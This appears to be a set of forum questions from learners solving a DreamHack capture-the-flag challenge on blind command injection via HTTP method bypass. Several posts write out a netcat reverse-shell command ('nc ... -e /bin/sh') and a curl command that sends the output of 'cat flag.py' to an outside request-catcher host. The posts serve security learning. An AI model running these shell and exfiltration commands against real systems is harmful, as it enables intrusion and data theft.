Hello, I solved the problem, but the nc command didn't work properly, so I have a question Open the port via nc -lvp 4000 on the local server Due to the problem, I tried to transfer the shell via the nc [myIP] 4000 -e /bin/sh command There is no answer from the local server... I think this was the case when solving other problems before, so I turned off the firewall, but it didn't work. Maybe NC name

It's understandable that if you send a head request directly to the target server, the content isn't visible because it doesn't return a body value. However, I wonder why if an external server is set up to receive and output the result value, the body value is displayed. In other words, if you make a head request directly to host3.dreamhack.gam12345, the body value will not be returned, but abcde.r

In this problem, I tried to send the result of 'cat flag.py' in the query parameters while sending a 'GET' request to the remote server. There is a space in the result of `cat flag.py' and must be wrapped with “"”. curl https://offxuuz.request.dreamhack.games/?query="$(cat+flag.py)” Therefore, above

Whether I'm using NC or curl, it doesn't respond when I bypass the method and input.. If you try running the same server directly, it works great Why is this the case? Any hints would be appreciated.

I sent two requests using curl and python to check the results of the system command (os.system (cmd)) executed by the server! However, I don't know why the result value of a request with Python doesn't come... S_METHOD contains a method to be used in place of the GET method. The request via cmd1 was not answered, and cmd2

I got NC for Windows, opened the server with -l -p 1234, closed the file contents, and tried to see if the response came, but I couldn't get an answer. I also set up port forwarding on the router, and I tried all the methods from the beginning. It's frustrating that there are no answers. So I think it's a blind-command. Also, they said it's easy to use the DreamHack Tools service, but is there anything like how to use it? sewage

@app .route ('/', methods= ['GET']) def index (): cmd = request.args.get ('cmd', “) If not cmd: return “? cmd= [cmd]” if request.method == 'GET': “ else: os.sy

After solving the answers, I deleted the question because I thought it had leaked too many hints. First, take a good look at “An environment where execution results cannot be confirmed” in the course Before applying it, you can read the other questions about how to apply it. Hul~ It was difficult because they were things I don't usually use, but after solving them... It's not that difficult. hehehe

I connected to host1.dreamhack.gam23376? cmd= [cmd] only appears like this, is this correct?

When I checked the code, the use of the GET method is restricted, and there are 3 methods that can be used: GET, HEAD, and OPTIONS, but since the HEAD method has almost the same function as the GET method, the problem is not solved even though the GET method part was manipulated with HEAD and the packet was sent.